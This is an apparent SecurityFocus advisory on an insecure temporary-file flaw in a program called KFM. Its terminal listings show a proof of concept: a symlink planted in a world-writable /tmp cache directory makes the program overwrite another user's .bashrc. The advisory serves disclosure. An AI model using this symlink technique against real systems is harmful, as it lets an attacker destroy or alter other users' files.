KFM Insecure TMP File Creation Vulnerability

root@ps:/tmp/kfm-cache-500 > ls -la
drwxrwxrwx 2 rws uboot 4096 Apr 18 21:18 .
drwxrwxrwt 15 root root 770048 Apr 18 21:16 ..
lrwxrwxrwx 1 rws uboot 18 Apr 18 21:18 index.html ->
/home/paul/.bashrc
-rw-r--r-- 1 rws uboot 0 Apr 18 21:16 index.txt

root@ps:/tmp/kfm-cache-500 > ls -la /home/paul/.bashrc
-rw-r--r-- 1 paul users 1458 Jan 23 13:56
/home/paul/.bashrc


and after running kfm as user 500:

root@ps:/tmp/kfm-cache-500 > ls -la /home/paul/.bashrc
-rw-r--r-- 1 paul users 271 Apr 18 21:19
/home/paul/.bashrc


 

Privacy Statement
Copyright 2010, SecurityFocus